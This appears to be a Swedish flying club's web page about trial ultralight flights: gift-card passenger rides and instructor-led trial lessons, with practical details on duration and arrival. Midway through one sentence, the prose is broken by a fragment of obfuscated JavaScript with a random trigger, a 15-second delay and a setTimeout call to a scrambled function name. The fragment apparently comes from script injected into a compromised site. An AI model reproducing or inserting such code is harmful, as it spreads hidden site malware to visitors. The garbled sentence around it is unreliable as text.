Prova på

Det finns flera möj­lig­he­ter att prova på hur det känns att flyga ult­ralätta flyg­plan. Antingen kan man köpa ett pre­sent­kort, eller så kan man boka tid med en flyglä­rare för en rik­tig provlektion.

Presentkort/Evenemangsflygning

Den per­fekta pre­sen­ten för den som har allt eller en kul akti­vi­tet på sven­sexan eller möhip­pan. Du sit­ter med som pas­sa­ge­rare och kan bestämma vart du vill flyga, t.ex. titta på ditt hus från ovan. Du kan få känna på lite g-krafter om du vill, eller bara sitta och njuta av en lugn färd blandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and mol­nen — du bestäm­mer. Men glöm inte kameran!

Prov­lek­tion

Här sit­ter du i förar­sto­len med en erfa­ren flyglä­rare vid din sida. Du får en genom­gång av instru­men­ten, kon­trol­lerna och pro­ce­du­rerna på mar­ken innan ni lyf­ter och får sedan en första intro­duk­tion i hur man han­te­rar flyg­pla­net i luften.

Prov­lek­tion

Båda typerna av flyg­ning inne­bär drygt en halv­timme i luf­ten. Man bör vara på plats minst 20 min före bokad tid för genom­gång och för­be­re­del­ser, och efteråt finns det tid för lite dis­kus­sio­ner och en fika i klubbstugan.

Kon­takta infor­ma­tions­an­sva­rig för mer infor­ma­tion om pre­sent­kort eller kon­takta någon av våra flyglä­rare för att boka en provlektion.